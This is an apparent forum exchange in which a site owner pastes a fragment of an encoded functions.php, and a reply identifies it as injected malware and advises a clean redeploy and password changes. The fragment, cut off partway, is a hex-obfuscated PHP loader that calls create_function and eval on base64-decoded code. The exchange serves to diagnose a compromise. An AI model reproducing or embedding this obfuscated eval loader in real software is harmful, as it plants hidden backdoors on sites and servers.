I just find out that file functions.php is encoded. Currently I can't find programmer who made that app but now I need to debug some functions. Don't know what are my possibilities to rewrite the whole functions file or try to decode it somehow.
Part of functions.php here
$zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; error_reporting(0); $zend_framework("", "\x7d\73\x40\145\x76\141\x6c\50\x40\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x4a\107\x56\62YTFmWTJiYWsxY3owaXIgPSAiXHg2NlwxNjVceDZlXDE0M1x4NzRcMTUxXHg2ZlwxNTZceDVmXDE0NVx4NzhcMTUxXHg3M1wxNjRceDczIjsgJGV2YTFmWTJiYWwxY3owaXIgPSAiXHg2ZlwxNDJceDVmXDE2M1x4NzRcMTQxXHg3MlwxNjQiOyAkZXZhMWZZMmJhbDFjejhpciA9ICJceDYzXDE1N1x4NjRcMTQ1XHg3OFw2Mlx4MzIiOyBpZigkZXZhMWZZMmJhazFjejBpcigkZXZhMWZZMmJhbDFjejBpcikgJiYgIWlzc2V0KCRHTE9CQUxTWyRldmExZlkyYmFsMWN6OGlyXSkpIHsNCgkkR0xPQkFMU1skZXZhMWZZMmJhbDFjejhpcl
This is not part of Zend Framework or work of your predecessor. This is malicious code injected to your server. You need to delete website and put new files from repository and change all passwords.
Read more: http://www.justbeck.com/zend_framework-wordpress-hacks/